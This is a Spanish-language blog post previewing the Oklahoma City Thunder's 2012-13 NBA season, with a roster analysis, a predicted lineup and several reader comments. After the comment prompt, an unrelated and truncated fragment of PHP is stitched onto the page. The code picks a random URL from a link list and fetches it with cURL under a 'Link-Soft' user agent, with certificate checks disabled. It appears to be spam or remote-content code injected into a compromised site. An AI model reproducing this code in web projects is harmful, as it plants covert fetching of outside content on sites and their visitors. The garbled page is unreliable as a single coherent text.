Oklahoma City Thunder: Sensaciones contradictorias

24 de October de 2012 por Hynreck

Después de disputar la mejor temporada de su corta historia, la sensación en Oklahoma debería ser eufórica. Ninguno de sus puntales supera los 24 años lo que conforma un equipo jovencísimo con margen de crecimiento y hambre de títulos. Vienen de jugar sus primeras finales y es más que probable que la plantilla suba su nivel respecto a la temporada pasada. Sin embargo existe la impresión de que su favoritismo ha disminuido. Las finales demostraron que aún están un paso por detrás de unos Heat que además se han reforzado (¡y cómo!) este curso. A esto se le une la competencia creciente en el Oeste, encabezada por unos Lakers que a poco que sepan encajar sus piezas les arrebatarán el cartel de seria alternativa.

La renovación de su tercera espada, el flamante oro olímpico James Harden, será otro tema peliagudo a tratar al final del curso presente. De hecho los rumores sobre su salida arreciaron en los días previos al draft  debido a un supuesto ofrecimiento a los Bobcats para conseguir el pick 2 del draft y así poder hacerse con Kidd-Gildrich.

Lo que sí hicieron fue renovar a Ibaka. El precio no es ningún chollo pero viendo como se paga el kilo de carne en otros equipos, de momento al bueno de Serge no le podríamos hacer miembro del club del Cazo-mix. Eso sí, sus prestaciones deben subir. Aparte de su intimidación y su capacidad taponadora (fuera de toda duda) debería mejorar números en todas las demás estadísticas. Nunca ha sido un gran reboteador pese al potencial que atesora y el hecho de ser uno de los peores asistentes de la liga le hacen de momento ser un jugador muy previsible en ataque. En su favor hay que decir que ha desarrollado un tiro de media distancia más que interesante. 

El problema en el juego interior ofensivo se acentúa con Kendrick Perkins al lado del español. 20 millones cobrarán en 2013 entre ambos para obtener una pareja muy diferente pero difícilmente complementaria. Ninguno de los dos tiene juego alguno al poste ni movimientos de espaldas al aro como para poder ser una amenaza interior y disponer de la alternativa de meter balones dentro de la zona. También queda esa duda. De tener un Al Jefferson o un Andrew Bynum, si habría alguna jugada para ellos teniendo el arsenal exterior que tiene Oklahoma. Eso sí, Perkins es una roca y quizás el mejor defensor interior de la liga. Junto a Ibaka forma quizás la mejor pareja en este aspecto de la liga.

Russell Westbrook y Kevin Durant no necesitan presentaciones. El primero dejando aparte sus lagunas como director y su dudosa selección de tiro, es una máquina anotadora imparable cuando está enchufado, y un gran defensor dotado de unas condiciones físicas fabulosas: Rápido, fuerte, ágil, atlético… el prototipo ideal de combo-guard.

Y Durant es, sencillamente, para muchos el mejor jugador de la liga. Tanto no afirmaremos pero objetivamente hablando habrá pocos que duden de que es un talento casi único. Su altura y fundamentos técnicos lo hacen casi indefendible y a esto añade un buen esfuerzo defensivo y una cabeza muy bien amueblada.

La tercera pata del banco es James Harden, excelso tirador y una pieza básica en el equipo. Titular encubierto, empezará desde el banquillo los partidos, puesto que Thabo Sefolosha seguirá siendo el perro de presa titular. Especialista defensivo, el suizo será el encargado de bailar con la más fea del equipo rival.

La aportación de la segunda unidad será básica para marcar las aspiraciones de los Thunder. Más allá de Harden, la plantilla se queda un poco corta. Eric Maynor vuelve de una lesión importante. Base cerebral, buen pasador con alguna limitación física, pero un buen base suplente al fin y al cabo, que aporta lo que no ofrece Westbrook. Daequan Cook y Lazar Hayward, jugadores antagónicos, intentarán dar descanso a Durant, mientras que el eterno Nick Collison, éste sí, ofrecerá minutos de calidad en el juego interior. Cole Aldrich aún está demasiado verde y las virtudes de Hasheem Thabeet son, por ejemplo (…) y otras muchas más.

Una gran sorpresa puede ser Perry Jones, rookie que realmente pensamos que puede tener un lugar destacado en esta liga. El ex de Baylor cayó mucho en el draft y en Oklahoma no dejaron pasar la oportunidad. Puede ser el arma interior que necesitan.

Así pues la apuesta continuista de un equipo joven, en crecimiento y finalista en el último curso debe ser lógica. Sin embargo sus rivales se han reforzado y ellos no. El juego exterior y el interior siguen descompensados en el aspecto ofensivo. Así que se ha puesto toda la confianza en el margen de mejora de los Durant (sí, aún puede mejorar más. Asusta), Westbrook, Harden e Ibaka, y en que la experiencia vivida de perder unas finales sirva para aprender de ello.

Quinteto: Russell Wesbrook, Thabo Sefolosha, Kevin Durant, Serge Ibaka, Kendrick Perkins.
Sexto hombre: James Harden.

Pronóstico: Segundos en el Oeste. Finales de conferencia

Comenta

56 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Melo15:
    Viva y que haces con Favors? Si acabas de renovar a Ibaka, Favors para ser eficaz necesita 25 minutos y eso en Ock no lo consigue, Kanter si me parece una buena opcion pero noFavors?

    Hombre Melo, Favors ya juega esos minutos teniendo como competencia a Al Jefferson, Millsap y Kanter. Con Ibaka recien renovado y acabando Perkins su contrato el mismo año que tendrian que renovar a Favors habria sido un movimiento magistral. Este mismo año el reparto de minutos del juego interior podria haber sido:

    Ibaka 33
    Perkins 25
    Favors 25
    Collison 13

    Y cada año un poco mas Favors, y una pareja Ibaka-Favors coincidir muchos años con Westbrook&Durant.

      Citar

  2. Jose Luis dice:
    #2

    Creo que nadie domina del todo bien el citar jajajaja. Leed el final del mensaje de Viva que es lo que responde él a Melo

      Citar

  3. txusma dice:
    #3

    Ibaka y Favors me parecen un poco redudantes. Sería increíble en defensa pero en ataque mejor no meter ni una dentro.

      Citar

  4. Viva_Dirk dice:
    #4

    Bueno Ibaka ya tiene un tiro de 5 metros bastante sólido y ambos pueden anotar cerca del aro. Además los Thunders ya tienen anotación con Durant y Westbrook, estos reboteando en ataque y cerrando el aro serian un juego interior buenísimo para el ritmo de las 2 estrellas.

      Citar

  5. Ruxixón dice:
    #5

    Creo que el quinteto de los Thunder será el mismo,con Selofosha de 2,de forma que tanto Kevin Martin como Lamb saldrán en la segunda unidad.Es más,creo que este año se verá mucho a Durant de 4 y vamos a ver en pista un Lamb-Martin en las posiciones de 2-3.

    Por cierto,las rondas según leí son las de Toronto (protegida TOP 3 y elecciones de la 15 a la 30,es decir la ronda es de los Thunder si es un pick de lottery que no sea TOP3) y de Dallas(protegida TOP 20)

      Citar

  6. Jabho dice:
    #6

    Jabho:
    EL mayor problema de los Thunder es un mercado pequeño que no sabemos si dará para mantener este equipo unido… porque si lo mantienen (el cuarteto Westbrook, Harden, Durant e Ibaka) es casi impensable que no acaben ganado álgún anillo los próximos 6 o7 años.

    Pues eso, que se veía venir. Buen traspaso de Thunder dads las circunstancias y los Rockets dejan de hacer un poco el primo. Harden se ha equivocado, a mi juicio.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>